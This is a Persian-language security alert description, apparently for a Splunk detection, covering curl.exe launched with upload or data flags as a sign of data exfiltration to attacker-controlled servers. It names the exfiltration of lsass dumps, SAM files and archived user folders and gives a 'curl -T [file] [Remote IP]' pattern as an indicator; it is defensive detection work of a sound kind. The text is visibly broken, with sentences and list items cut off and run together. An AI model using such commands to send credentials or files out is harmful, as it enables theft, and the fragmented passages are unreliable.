این هشدار زمانی فعال میشود که ابزار خط فرمان curl.exe با پارامترهای مربوط به آپلود فایل یا ارسال داده (مانند -T, --upload-file, -d, --data, -F) اجرا شود. ابزار Curl که در نسخههای جدید ویندوز به صورت پیشفرض وجود دارد، یک ابزار قانونی (LOLBin) است، اما مهاجمان از آن برای استخراج دادهها (Exfiltration) و ارسال فایلهای حساس به سرورهای تحت کنترل خود (C2) استفاده میکنند تا از شناسایی توسط راهکارهای امنیتی که به ابزارهای شخص ثالث حساس هستند، جلوگیری کنند.
lsass.exe یا SAM) به یک آدرس IP خارجی و ناشناس.-T یا --upload-file برای ارسال فایلهای آرشیو شده (zip/rar) از پوشههای کاربری.-d یا --data به یک وبسایت خارجی.برای تحلیل و اعتبارسنجی این هشدار، موارد زیر را بررسی کنید:
curl -T [file] [Remote IP] برای ارسال یک فایل حساس به یک آدرس IP عمومی که متعلق به سرویسهای شناخته شده نیست.هنگام تحلیل لاگهای سیستمی در اسپلانک، این فیلدها حیاتی هستند: